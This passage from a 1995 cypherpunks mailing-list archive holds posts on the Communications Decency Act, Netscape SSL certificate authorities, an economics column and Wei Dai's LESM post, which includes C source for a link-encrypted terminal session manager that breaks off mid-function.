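The cost is visible in the bursty case: 40 bytes take three ticks to drain, which is the latency side of the trade-off raised in the quoted questions.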




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: joshua geller <joshua@dee.retix.com>
Date: Thu, 9 Feb 95 17:52:12 PST
To: emerth@gpu.srv.ualberta.ca
Subject: Re: So, what's it all about?
In-Reply-To: <199502100127.SAA82871@gpu2.srv.ualberta.ca>
Message-ID: <199502100151.RAA25844@sleepy.retix.com>
MIME-Version: 1.0
Content-Type: text/plain



>   I went to a UNIX trade show yesterday, and the main speaker was a 
>   security type. He talked about "the cypherpunks" among other things.
>   He said you are really scary and dangerous and ...
>   But of course he had to also project this address (cypherpunks@toad.com)
>   on the screen.

can't imagine he is much of a security stud if he is that deluded.

what was his name?

josh




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Rothenburg Walking-Owl <rrothenb@ic.sunysb.edu>
Date: Thu, 9 Feb 95 14:58:47 PST
To: slowdog@wookie.net (slowdog)
Subject: Re: Effects of S.314 (Communications Decency Act)
In-Reply-To: <Pine.LNX.3.91.950209105014.8284B-100000@chewy.wookie.net>
Message-ID: <199502092258.RAA02881@libws2.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain



> On Thu, 9 Feb 1995, Robert Rothenburg Walking-Owl wrote:
> 
> > The line between indecency and obscenity is vague. Legal defense fees are
> > not... nor are opportunistic prosecutors-- which is a real problem. Look at
> > what happened to Jello Biafra and the Dead Kennedys if you'd like an

[ .. ]

> This is part of the danger. It to some degree doesn't matter how 
> restrictive or "enforceable" the law might be, or even whether or not 
> prosecutions will stick. Arrests and prosecutions will take a financial 
> toll on those targeted, and will create a chilling effect in the online 
> community, meaning sysops and BBS operators will start policing 
> themselves too severely in an effort to avoid political or legal scrutiny.

Exactly. It's already happening. I've noticed on local BBS's they are afraid
of conversation about controversial subjects or files having to do with
things like do-it-yourself-birth control methods, drug legalization, or
crypto... some of the networks like RIME are also jittery about certain
topics like crypto or how telephones work.

> > The "safe harbor" is 10pm, but many radio stations (like WUSB here in Stony

[ message accidentally zapped ]

> broadcast paradigm, while the online world operates within the network 
> paradigm. There are no hours in which it is safe to broadcast because 
> there is no "broadcast" in the traditional sense.

Yes, I was discussing broadcasting. Scary thought is that because networks
are different they will try to outright ban everything.

What boggles my mind is how that hypothetical ratings system(s) the WSJ
article mentioned would operate... let alone who would rate content (very
controversial in movie ratings here in the US).

> > Problems with these vague and-or unenforceable "decency" laws is that they
> > allow for selective enforcement which is often motivated more by politics
> > and personal greed than by their alleged concerns for decency.

> And is also, as stated above, often motivated out of a desire to force 
> the public to overly-police themselves to avoid prosecution.

And "voluntarily" comply with their sense of values.

> - dog

Rob.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kipp@warp.mcom.com (Kipp E.B. Hickman)
Date: Thu, 9 Feb 95 10:04:03 PST
To: cypherpunks@toad.com
Subject: Re: skronk
In-Reply-To: <199502081852.KAA01719@gwarn.versant.com>
Message-ID: <3hdl7u$35a@flop.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain



In article <199502082025.MAA00565@jobe.shell.portal.com>, hfinney@shell.portal.com writes:
> >THUS SPAKE "Kipp E.B. Hickman" <kipp@warp.mcom.com>:
> ># It does what you are trying to accomplish (I think), and it is already deployed
> ># in production code (the Netscape client and server products). In addition, we
> ># announced this week a free (for non-commercial use) reference implementation.
> ># The code will be out on the net as soon as the lawyers are happy :-)
> 
> When we last left this story, only certificates from a few (one?)
> signatory authorities were going to be accepted by Netscape clients.
> Would this mean that competitors offering Netscape servers would have to
> go to Netscape to get their keys signed in order to interoperate with
> existing Netscape clients?  I think this is too limiting.

The SSL protocol doesn't define how certificates are truly validated:
It does indicate what operations should be performed, but it doesn't
say how you go about getting the data to perform the operations.

Because there isn't a solid public-key infrastructure in place today,
the Netscape Navigator product (1.0 and the up and coming 1.1) only
supports a few well known CA's that are built into the client
(ick). The CA's that are supported today are:

    C=US, OU=Test CA, O=Netscape Communications Corp.
    C=US, O=RSA Data Security, Inc., OU=Commercial Certification Authority
    C=US, O=RSA Data Security, Inc., OU=Secure Server Certification Authority
    C=US, O=MCI, OU=internetMCI, OU=MALL

So you see, you don't have to come to Netscape Communications Corp. to
get a certificate. Of course, this list is kinda short, etc. etc. etc.
We have IPRA's certificate too, but because IPRA has no financial
backbone, we have not included it in the Navigator product.

> People should be able to choose their own key signers.  This should be a
> configuration option.  It should not be compiled into the client!  That
> hurts your own flexibility as well as interfering with interoperability.

Of course this sucks. We plan on fixing this in a future release of
the navigator (after the 1.1 release).

> Can I use this reference implementation and set up a SSL-compatible
> service today, or do I have to go to you and/or everyone's friends at RSA
> and get a signature first?  As long as it is the latter I think that SSL
> is not going to be able to be a well-established standard.  People are
> going to resent having to register with the authorities in order to set
> up a secure web page.

SSL requires server operators to be certified so that the end users
(e.g. consumers) can have some faith in the data they are receiving,
and believe in the privacy of the communications. IMHO, before you can
get the consumers to truly believe, you must have a technically sound
solution.

It would be possible to modify the protocol to allow a non-certified
server to operate. However, this sort of thing is subject to the
man-in-the-middle attack. If we allow this sort of attack, and it
turns out to be the only easy way for an attack to occur, guess what
will happen?

---------------------------------------------------------------------
Kipp E.B. Hickman          Netscape Communications Corp.
kipp@netscape.com          http://home.mcom.com/people/kipp/index.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Rothenburg Walking-Owl <rrothenb@ic.sunysb.edu>
Date: Thu, 9 Feb 95 15:03:44 PST
To: joshua@dee.retix.com (joshua geller)
Subject: Re: Not necessarily crypto but scary anyway...
In-Reply-To: <199502091612.IAA25397@sleepy.retix.com>
Message-ID: <199502092303.SAA03244@libws2.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain


> >   Yes indeed, in response to the H666 bill. The Dems placed up for vote the 
> >   text of the 4th Amendment without attributing it to be such. It was 
> >   defeated. Dems then immediately took to the floor of the House accusing 
> >   the Repubs of trying to dismantle the Constitution.
> 
> so is there a list of names of the people who voted against it? I use
> the term "people" very loosely.

A list of what congresspersons voted for/against various bills (even previous
ones like Cantwell and DT) would be useful. A lot of groups do that.


> 
> josh
> 

Rob





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rishab@dxm.ernet.in (Rishab Aiyer Ghosh)
Date: Thu, 9 Feb 95 23:09:20 PST
To: cypherpunks@toad.com
Subject: Re:  Selection key crypto protocol trial balloon
In-Reply-To: <9502082007.AA09524@anchor.ho.att.com>
Message-ID: <awLe2c4w165w@dxm.ernet.in>
MIME-Version: 1.0
Content-Type: text/plain


wcs@anchor.ho.att.com writes:

> > Um no. The main thing is that what is extracted with the selection key is
> > _different_ from what was put in...
> 
> But the only things the selection key can extract are what the senders
> put in plus what the system did to it once it was there, which is not
> informationally different than what the senders put there.

True, just as ciphertext is not different, informationally, from plaintext.
It's just a pair of transformations, both by the system, one in response to
the sender and the other in response to the receiver. A bit like an airlock -
if the two transformations are the right ones, extraneous information such as
the identity should not pass through.

> I suppose you could play some games by sending the message in 
> multiple parts, with parts sent by 1-way anonymous remailer,
> but there's still a certain amount of traffic analysis you can do.
> 
> 	Bill


-----------------------------------------------------------------------------
Rishab Aiyer Ghosh                                "In between the breaths is
rishab@dxm.ernet.in                                  the space where we live"
rishab@arbornet.org                                        - Lawrence Durrell
Voice/Fax/Data +91 11 6853410  
Voicemail +91 11 3760335                 H 34C Saket, New Delhi 110017, INDIA  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rishab@dxm.ernet.in
Date: Thu, 9 Feb 95 23:09:19 PST
To: cypherpunks@toad.com
Subject: Labour and capital in a post-industrial economy
Message-ID: <gate.T140Zc1w165w@dxm.ernet.in>
MIME-Version: 1.0
Content-Type: text/plain


Earlier I'd written on the fall of corporations due to cryptoanarchy. This one
is on the decline of (knowledge) capital and property rights, and the rise of
labour.

------cut here-------
Electric Dreams
Weekly column for The Asian Age by Rishab Aiyer Ghosh
#47, 6/February/1995: Labour and capital in a post-industrial economy

The information economy will require not only knowledge
capital, but also knowledge labour. Labour has
historically been subservient to capital (or land, in
agricultural societies) as a source of power and wealth,
leading to various forms of political upheaval contrary to
the naturally unequal relationship between these two
essentials of an economy. But the knowledge revolution
will change the nature of labour even more than it will
that of capital, while also decreasing the distinction
between them.

One of the major differences between capital and labour in
the past is that capital, owned and protected by property
rights, can earn for its owners without their making any
significant effort. Labour, though, is inherent in its
'owners' - you really don't need laws to protect your
ownership of your capacity to work - and earns only with
considerable effort from them. It follows that owners of
capital are wealthier than providers of labour, at least
until a digital deluge changes the rules altogether.

A strict (but not universally accepted) definition of
knowledge capital would consist primarily of those
relatively static forms of intellectual output - specific
ideas, software, works of art - that can be treated as
property, thereby inviting legal protection in the form of
patent and copyright. Like traditional capital, these
don't necessarily require the intervention of their owner
(after the work of painting or inventing is over) to
generate cash. Intellectual property rights will do the
earning.

Unfortunately for fans of intellectual property rights,
they are unworkable. As the sprawling information economy
grows volatile and fast-changing, copyrights and patents
are simply not going to be enforced. The ease of
undetectable duplication, together with the suffocating
effects of strong protection on growing markets, have been
acknowledged by everyone familiar with both the
technological as well as economic aspects. Expertise,
then, not information, is the key.

Expertise, which is dynamic and constantly adapting, is
not 'intellectual property'. It hardly requires legal
protection, and cannot be separated from its owners, the
experts, in whom it inheres. Nor do experts earn without
themselves making active use of their skills. Experts are,
in fact, knowledge labourers.

Not, of course, that these labourers own no capital. Quite
the contrary -experts almost always rely on more static
works, ideas, resources, that are their own. However, this
'property' being less important than their expertise,
knowledge labourers (or knowledge workers, to use a more
familiar but not always equivalent term) often don't
bother about patents or copyrights. Knowledge capital is
not, after all, as valuable as expertise and is also more
inconvenient to rely on - so it will act as the auxiliary
resource, rather as labour has done in industry.

Once we realize this reversal of roles between labour and
capital in a post-industrial economy, we face the prospect
of a vast labour force of experts of all sorts. Knowledge
labour will not always be high-end, though - for every
millionaire quant plotting coffee futures against money-
market derivatives, there will be the human agent,
cybrarian in the jargon, hunting for curious clients rare
species of data amid the information jungle. And there
will always be some who cling on to their intellectual
property rights and attempt to extract license fees from
the on-line universe. But their share of the economy will
shrink, and finally, in the era of expertise, what you
have will matter less, than what you do.



Rishab Aiyer Ghosh is a freelance technology consultant
and writer. You can reach him through voice mail (+91 11
3760335) or e-mail (rishab@dxm.ernet.in).

--====(C) Copyright 1994 Rishab Aiyer Ghosh. ALL RIGHTS RESERVED====--
 This article may be redistributed in electronic form only, PROVIDED 
 THAT THE ARTICLE AND THIS NOTICE REMAIN INTACT. This article MAY NOT 
 UNDER ANY CIRCUMSTANCES be redistributed in any non-electronic form,
 or redistributed in any form for compensation of any kind, WITHOUT 
PRIOR WRITTEN PERMISSION from Rishab Aiyer Ghosh (rishab@dxm.ernet.in)
--==================================================================--

------cut here-------


-----------------------------------------------------------------------------
For Electric Dreams subscriptions and back issues, send a mail to
rishab@arbornet.org with 'get help' as the message Subject.

Rishab Aiyer Ghosh          rishab@dxm.ernet.in           rishab@arbornet.org
Vox +91 11 6853410 Voxmail 3760335       H 34C Saket, New Delhi 110017, INDIA  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Eric Merth" <emerth@gpu.srv.ualberta.ca>
Date: Thu, 9 Feb 95 17:27:21 PST
To: cypherpunks@toad.com
Subject: So, what's it all about?
Message-ID: <199502100127.SAA82871@gpu2.srv.ualberta.ca>
MIME-Version: 1.0
Content-Type: text


I went to a UNIX trade show yesterday, and the main speaker was a 
security type. He talked about "the cypherpunks" among other things.
He said you are really scary and dangerous and ...
But of course he had to also project this address (cypherpunks@toad.com)
on the screen.

So are you really scary and dangerous? What are the cypherpunks?

Just curious,

-EWM



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Wei Dai" <weidai@eskimo.com>
Date: Thu, 9 Feb 95 18:43:52 PST
To: cypherpunks@toad.com
Subject: LESM - Link Encrypted Session Manager (3rd try)
Message-ID: <199502100243.AA03571@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


I tried to distribute LESM to the cypherpunks mailing list twice, and 
neither of them made it to the nntp.hks.com list archive (my 
later posts HAVE).  What is going on here?  This is a second repost.

-----BEGIN PGP SIGNED MESSAGE-----

I finished hacking Matt's ESM to do link encryption yesterday, but 
for some reason the mail I sent to cypherpunks didn't get echoed back 
to me, so I'm sending this again.

To install: get ESM and RSAREF, make sure you can compile ESM, 
then replace the esm.c with my hacked version and recompile.

To use: same as ESM, but there's an extra option "-b bandwidth", the 
default is 100 cps.

I've attached the modified esm.c here since it doesn't include any 
crypto code.  To get ESM, write to cfs@research.att.com and state the 
following:

	- you are in the US or Canada, and
	- you are a US or Canadian citizen or legal permanent
	  resident, and
	- You've read and understand the license and export
	  conditions.

RSAREF is in ftp://rsa.com/rsaref/

Wei Dai


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLzqTtTl0sXKgdnV5AQEmbgP8CRxE+RCGsDXwwShWhZKGytSywyWZ8RXB
RPBHZmk6UgdpCR2VVo8wXjcPuEv4SHp9ZjhFTq53JZ/s3YcV5FxF33/ivSlh1Ra4
P8GSYnoEaIJoFrJyagukbBUaY6zWCx0PcnsLoVArCxujwRYwfrQvHdiNx13z7bJh
OSEhhoE9djg=
=PY8P
-----END PGP SIGNATURE-----


-------------- Enclosure number 1 ----------------
/*
 * LESM - Link Encrypted Session Manager
 * v0.6a.01
 * Wei Dai
 * 2/8/1995
 *
 * This program is a quick and dirty hack of:
 */

/*
 * ESM - Encrypted Session Manager
 * v0.6a
 * matt blaze
 * January 1995
 */

/*
 * The author of this software is Matt Blaze.
 *              Copyright (c) 1995 by AT&T.
 * Permission to use, copy, and modify this software without fee
 * is hereby granted, provided that this entire notice is included in
 * all copies of any software which is or includes a copy or
 * modification of this software and in all copies of the supporting
 * documentation for such software.
 *
 * This software is subject to United States export controls.
 *
 * THIS SOFTWARE IS BEING PROVIDED "AS IS", WITHOUT ANY EXPRESS OR IMPLIED
 * WARRANTY.  IN PARTICULAR, NEITHER THE AUTHORS NOR AT&T MAKE ANY
 * REPRESENTATION OR WARRANTY OF ANY KIND CONCERNING THE MERCHANTABILITY
 * OF THIS SOFTWARE OR ITS FITNESS FOR ANY PARTICULAR PURPOSE.
 */
/*
 * Some of this file was stolen from the BSD "script" program, which
 * is covered under the following notice:
 *
 * Copyright (c) 1980 Regents of the University of California.
 * All rights reserved.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 * 1. Redistributions of source code must retain the above copyright
 *    notice, this list of conditions and the following disclaimer.
 * 2. Redistributions in binary form must reproduce the above copyright
 *    notice, this list of conditions and the following disclaimer in the
 *    documentation and/or other materials provided with the distribution.
 * 3. All advertising materials mentioning features or use of this software
 *    must display the following acknowledgement:
 *	This product includes software developed by the University of
 *	California, Berkeley and its contributors.
 * 4. Neither the name of the University nor the names of its contributors
 *    may be used to endorse or promote products derived from this software
 *    without specific prior written permission.
 *
 * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND
 * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
 * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
 * ARE DISCLAIMED.  IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE
 * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
 * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
 * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
 * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
 * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
 * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
 * SUCH DAMAGE.
 */

#ifndef lint
char copyright1[] =
"@(#) Copyright (c) 1980 Regents of the University of California.\n\
 All rights reserved.\n";
char copyright2[] =
"@(#) Copyright (c) 1995 AT&T\nAll rights reserved.\n";
#endif /* not lint */

#include <sys/types.h>
#include <sys/stat.h>
#include <termios.h>
#ifndef SUN
#include <sys/ioctl.h>
#endif
#include <sys/time.h>
#include <sys/file.h>
#include <sys/signal.h>
#include <unistd.h>
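#include <stdio.h>
#include <stdlib.h>	/* atol, getenv, exit */
#include <string.h>	/* strlen, strchr */
#include <ctype.h>	/* isprint */
#include <fcntl.h>	/* O_RDWR */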
#include "global.h"
#include "rsaref.h"
#include "esm.h"


char	*shell;
int	master;
int	slave;
int	subchild;

int escape=036; /* ^^ */
int ciphstate=0;
int ciphbyte=0;

int keyed=0;

struct	termios tt;
struct	winsize win;
int	lb;
int	l;
char	line[] = "/dev/ptyXX";
int	aflg;

#define REMOTE 0
#define LOCAL 1
#define CALC 2

int mode=LOCAL;
int paranoid=0;

#define SL_START 0
#define SL_GOT1 1
#define SL_GOT2 2
#define SL_GOT3 3
#define SL_GOT4 4
#define SL_KEYING 5
#define SL_CRYPT 6
int sloutstate=SL_START;
char *cmd=NULL;

#define TRANS 0
#define CMDWAIT 1
#define CIPHER 2
#define KEYWAIT 3

#define IV0 0
#define IV1 1
#define IV2 2
#define IV3 3
#define C0  4
#define C1  5

int state=TRANS;
int cstate=IV0;

FILE *fpmaster;

struct timeval tvPause={0,10000};
struct timeval tvNoPause={0,0};

unsigned char filler = (unsigned char) 31;

#define bwrite(fp,buf,len) (fwrite(buf,len,1,fp))

main(argc, argv)
	int argc;
	char *argv[];
{
	extern char *optarg;
	extern int optind;
	int ch, result;
	void finish();
	char *getenv();
	fd_set fds;
        struct timeval tv;

	while ((ch = getopt(argc, argv, "e:b:splrci")) != EOF)
	  	switch((char)ch) {
	  	    case 'e':
	  		cmd=optarg;
	  		break;
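                    case 'b':
                        /* bandwidth in chars per second; refuse 0 or less
                           rather than divide by zero below */
                        if (atol(optarg) <= 0) {
                                fprintf(stderr, "lesm: bandwidth must be positive\n");
                                exit(1);
                        }
                    	tvPause.tv_usec=(long)1000000/atol(optarg);
                        break;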
	  	    case 'i':
	  	    case 's':
	  	    case 'p':
	  		paranoid=1;
	  	    case 'r':
	  		mode=REMOTE;
	  		break;
	  	    case 'l':
	  		mode=LOCAL;
	  		break;
	  	    case 'c':
	  		mode=CALC;
	  		break;
	  	    case '?':
	  	    default:
	  		fprintf(stderr,
	  		   "usage: lesm [-rlc] [-b bandwidth] [-e program]\n");
	  		exit(1);
	  	}
	argc -= optind;
	argv += optind;

	if ((shell=getenv("SHELL")) == NULL)
		shell = "/bin/sh";
	
      	getmaster();

	(void) signal(SIGCHLD, finish);
	subchild = fork();
	if (subchild < 0) {
		perror("fork");
		fail();
	}
	if (subchild==0)
		doshell();
	else {
		/* main loop */
		printf("LESM v0.6a.01, hacked by Wei Dai from ESM v0.6a - encrypted session manager\n");
		printf("    by Matt Blaze, AT&T Bell Labs, January 1995\n");
	       	randinit();
		cipherinit();
		switch (mode) {
		    case REMOTE:
			if (paranoid)
			     printf("remote server ready\n");
			else
			     printf("remote server ready; ctl-^ to escape\n");
			break;
		    case LOCAL:
			printf("local layer ready (run 'lesm -s' on remote)\n");
			break;  
		    default:  /* not yet */
			printf("lesm ready\n");
		}
		rawtty();
		fpmaster=fdopen(master,"w");
		if (fpmaster == NULL)
			done();
		if (paranoid)
			startsession();
            
                while(1)
                {
			FD_ZERO(&fds);
			FD_SET(0,&fds);
                        
                        tv=tvNoPause;
                        result=select (FD_SETSIZE,&fds,NULL,NULL,&tv);

                        if (result==1)
                        	doinput();

      	                if (mode==LOCAL && sloutstate==SL_CRYPT && result==0)
                        	doslavein(filler);
                                
                        if (result<0)
                        	break;

	       		FD_ZERO(&fds);
	       		FD_SET(master,&fds);
                        
                        tv=tvNoPause;
                        result=select (FD_SETSIZE,&fds,NULL,NULL,&tv);
	       		                    	
                        if (result==1)
                                dooutput();

                        if (mode==REMOTE && state==CIPHER && result==0)
                        	domasterout(filler);

                        if (result<0)
                        	break;
		}
		done();
	}                                          
}

doinput()
{
	int cc;
	int i;
	static unsigned char ibuf[512];
	
	if ((cc = read(0, ibuf, 512)) > 0) {
		switch (mode) {
		    case REMOTE:
			for (i=0; i<cc; i++)
				domasterin(ibuf[i]);
			break;
		    case LOCAL:
			for (i=0; i<cc; i++)
				doslavein(ibuf[i]);
			break;
		    default:
			for (i=0; i<cc; i++)
				bwrite(fpmaster,&ibuf[i],1);
			break;
		}
		fflush(fpmaster);
		fflush(stdout);
	} else
		done();
}

doslavein(ibuf)
     unsigned char ibuf;
{
	int c;
	static int count=0;
        struct timeval tv;
	
	switch (sloutstate) {
	    case SL_CRYPT:
		if (ibuf==escape) {
			bwrite(stdout,">>",2);
			fflush(stdout);
			if (slescape()) {
				printf("q\r\nEntering CLEARTEXT mode\r\n");
				bwrite(fpmaster,"PPPPPPPPPPPPPPPP",16);
				sloutstate=SL_START;
			}
			break;
		}			
		c=cfb8_encrypt(ibuf);
		if (!(++count % 8))
			bwrite(fpmaster,"!",1);
		sendhex(fpmaster,c);
        	tv=tvPause;
                select (FD_SETSIZE,NULL,NULL,NULL,&tv);
		break;
	    default:
		bwrite(fpmaster,&ibuf,1);
		break;
	}
}

slescape()
{
	char buf;
	int c;
	int escaped=0;
	
	while (read(0,&buf,1)>0) {
		if (escaped) {
			escaped=0;
			bwrite(fpmaster,&buf,1);
			continue;
		}
		if (buf==escape) {
			c=cfb8_encrypt(buf);
			sendhex(fpmaster,c);
			return 0;
		}
		bwrite(stdout,&buf,1);
		fflush(stdout);
		if (buf=='\\') {
			/* next char goes out as cleartext; was "mode=escaped",
			   which reset mode and never set the flag */
			escaped=1;
			continue;
		}
		if (buf=='\r')
			return 0;
		if (buf=='C') {
			return 1;
		}
		printf("\r\nType one of the following:\r\n");
		printf("  \\[char] to send char as cleartext\r\n");
		printf("  ctrl-^ to send escape character\r\n");
		printf("  'C' to return to CLEARTEXT session\r\n");
		printf("  <enter> to return to encrypted session\r\n");
	}
	return 1; /* should never happen */
}

			       

domasterin(ibuf)
     unsigned char ibuf;
{
	int c;
	char ch;
	static int bad=0;
	
	switch (state) {
	    case TRANS:
	  	if (ibuf != escape)
	  		bwrite(fpmaster, &ibuf, 1);
	  	else {
	  		state=CMDWAIT;
	  		bwrite(stdout,">>",2);
	  		cstate=IV0;
	  	}
	  	break;
	    case CMDWAIT:
	  	if (ibuf == escape) {
	  		bwrite(fpmaster, &ibuf, 1);
	  		state=TRANS;
	  	} else switch (ibuf) {
	  	    case '\r':
	  	    case '\n':
	  		bwrite(stdout,"\r\n",2);
	  		state=TRANS;
	  		break;
	  	    case 's':
	  	    case 'S':
	  		startsession(LONG);
	  		break;
	  	    case 'Q':
	  		done();
	  		break;
	  	    default:
	  		printf("Type 's' to start encrypted session\r\n");
	  		printf("     'Q' to terminate remote session\r\n");
	  		printf("     ctrl-^ to send escape character\r\n");
	  		printf("     <enter> to return to session\r\n");
	  		break;
	  	}
	  	break;
	    case CIPHER:
	  	if (strchr("0123456789abcdef!",ibuf)!=NULL) {
	  		bad=0;
	  		if ((c = cipherout(ibuf)) >= 0) {
	  		      	ch=c;
                                if (ch!=filler)
	  			      	bwrite(fpmaster,&ch,1);
	  		}
	  	} else if (bad++ > 16) {
	  		delkey();
	  		bwrite(stdout,"XXXXXXXXXXXXXXXX",16);
	  		if (paranoid)
	  		      	done();
	  		state=TRANS;
	  	} else
	  		ciphstate=0;
	  	break;
	    case KEYWAIT:
	  	if (strchr("0123456789abcdef:",ibuf)!=NULL) {
			masterkeyin(ibuf);
		} else {
			delkey();
			bwrite(stdout,"XXXXXXXXXXXXXXXX",16);
			if (paranoid)
				done();
			state=TRANS;
		}
		break;
	}
}

int pubstat=0;
int pubpos=0;
unsigned char pubbyte=0;
int pksize = -1;

startsession()
{
	static unsigned char buf[5] = {0177, '~', 0177, '~', 'L'};
	static unsigned char colon=':';
	int i;

	pklen=dhparams[LONG].primeLen;
	printf("Starting remote side of %d bit key exchange.\r\n",pklen*8);
	if (createdh(LONG) < 0)
		return -1;
	bwrite(stdout,buf,5);
	for (i=0; i<pklen; i++)
		sendhex(stdout,ourpub[i]);
	bwrite(stdout,&colon,1);
	pksize=LONG;
	pubstat=0;
	pubpos=0;
	pubbyte=0;
	state=KEYWAIT;
	return 0;
}

sltranspub(len)
{
	static unsigned char colon=':';
	int i;
	
	printf("\r\nStarting local key exchange.\r\n");
	for (i=0; i<len; i++)
		sendhex(fpmaster,ourpub[i]);
	bwrite(fpmaster,&colon,1);
	printf("entering ENCRYPTED mode; type ctrl-^ to escape\r\n");
}

masterkeyin(c)
     char c;
{
	int bits;

	if (c==':') {
		if (pubpos!=(pklen+2)) /* +2 for trailing checkword */
			goto abort;
		if (mcalckeys(pksize)<0) /* also verifies */
			goto abort;
		ciphstate=0;
		state=CIPHER;
		return;
	} else if (pubpos<MAXPUBKEY) {
		bits=atoh(c);
		if (bits<0)
			goto abort;
		if (pubstat) {
			pubbyte |= bits;
			otherpub[pubpos]=pubbyte;
			pubpos++;
		} else {
			pubbyte = bits<<4;
		}
		pubstat = 1-pubstat;
		return;
	}
    abort:
	bwrite(stdout,"XXXXXXXXXXXXXXXX",16);
	if (paranoid)
		done();
	state=TRANS;
}

int mcalckeys(len)
     int len;
{
	int i;
	
	if (dhagree(len)<0) /* sets up session keys */
		return -1;
	for (i=0; i<8; i++) {
		ivin[i]=0;
		ivout[i]=0xff;
	}
	if (cfb8_decrypt(otherpub[pklen]) ||
	    cfb8_decrypt(otherpub[pklen+1]))
		return -1;
	return 0;
}

int slcalckeys(len)
     int len;
{
	int i;
	
	if (dhagree(len)<0) /* sets up session keys */
		return -1;
	for (i=0; i<8; i++) {
		ivout[i]=0;
		ivin[i]=0xff;
	}
	ourpub[pklen]=cfb8_encrypt(0);
	ourpub[pklen+1]=cfb8_encrypt(0);
	return 0;
}

initslkey(param)
     int param;
{
	if ((param<0) || (param>2))
		return -1;
	pklen=dhparams[param].primeLen;
	pksize=param;
	pubstat=0;
	pubpos=0;
	pubbyte=0;
}

slkeyin(c)
     char c;
{
	int bits;

	if (c==':') {
		if (pubpos!=pklen)
			goto abort;
		if (createdh(pksize)<0)
			goto abort;
		if (slcalckeys(pksize)<0)
			goto abort;
		sltranspub(pklen+2);
		ciphstate=0;
		sloutstate=SL_CRYPT;
		return;
	} else if (pubpos<MAXPUBKEY){
		bits=atoh(c);
		if (bits<0)
			goto abort;
		if (pubstat) {
			pubbyte |= bits;
			otherpub[pubpos]=pubbyte;
			pubpos++;
		} else {
			pubbyte = bits<<4;
		}
		pubstat = 1-pubstat;
		return;
	}
    abort:
	bwrite(stdout,"X",1);
	sloutstate=SL_START; /* local side tracks sloutstate, not state */

}



int cipherout(ch)
     char ch;
{
	int bits;
	
	if (ch=='!') {
		ciphstate=0;
		return -1;
	}
	bits=atoh(ch);
	if (ciphstate) {
		ciphbyte |= bits;
		ciphstate=0;
		return(cfb8_decrypt(ciphbyte));
	} else {
		ciphbyte = bits<<4;
		ciphstate=1;
		return -1;
	}
}

int ciphercalcin(ch)
     unsigned char ch;
{
	static unsigned char iv[8];
	static unsigned int cbuf;
	int c;
	int i;

	c = atoh(ch);
	switch (cstate) {
	    case IV0:
		for(i=0; i<8; i++)
			iv[i]=0;
		cbuf = (c&0xf)<<4;
		cstate=IV1;
		return '.';
	    case IV1:
		cbuf = cbuf | (c&0xf);
		iv[7]=cbuf;
		cstate=IV2;
		return '.';
	    case IV2:
		cbuf = (c&0xf)<<4;
		cstate=IV3;
		return '.';
	    case IV3:
		cbuf = cbuf | (c&0xf);
		iv[6]=cbuf;
		cstate=C0;
		return '.';
	    case C0:
		cbuf = (c&0xf)<<4;
		cstate=C1;
		return '.';
	    case C1:
		cbuf = cbuf | c&0xf;
		c=cfb8_decrypt(cbuf);
		cstate=C0;
		if (isprint(c)) {
			bwrite(fpmaster,&c,1);
			return '_';
		} else {
			return '?';
		}
	    default:
		return '?';
	}
}

#include <sys/wait.h>

void
finish()
{
	union wait status;
	register int pid;
	register int die = 0;

	while ((pid = wait3((int *)&status, WNOHANG, 0)) > 0)
		if (pid == subchild)
			die = 1;

	if (die)
		done();
}

dooutput()
{
	register int cc;
	int i;
	unsigned char obuf[512];
	
	if ((cc = read(master, obuf, 512)) > 0) {
		switch (mode) {
		    case REMOTE:
			for (i=0; i<cc; i++)
				domasterout(obuf[i]);
			break;
		    case LOCAL:
			for (i=0; i<cc; i++)
				doslaveout(obuf[i]);
			break;
		    default:
			for (i=0; i<cc; i++)
				bwrite(stdout, &obuf[i], 1);
			break;
		}
		fflush(fpmaster);
		fflush(stdout);
	} else
		done();
}

domasterout(obuf)
     unsigned char obuf;
{
	int c;
	static int count=0;
        struct timeval tv;
	
	switch (state) {
	    case CIPHER:
		c=cfb8_encrypt(obuf);
		if (!(++count % 8))
			bwrite(stdout,"!",1);
		sendhex(stdout,c);
        	tv=tvPause;
                select (FD_SETSIZE,NULL,NULL,NULL,&tv);
		break;
	    case TRANS:
		bwrite(stdout, &obuf, 1);
		break;
	    default:
		/* throw away since i/o screws up keying */
		break;
	}
}


doslaveout(obuf)
     unsigned char obuf;
{
	static int bad=0;
	int c;
	char ch;
	
	switch (sloutstate) {
	    case SL_START:
	   	bwrite(stdout, &obuf, 1);
	   	if (obuf==0177)
	   		sloutstate=SL_GOT1;
	   	break;
	    case SL_GOT1:
	   	bwrite(stdout, &obuf, 1);
	   	if (obuf=='~')
	   		sloutstate=SL_GOT2;
	   	else
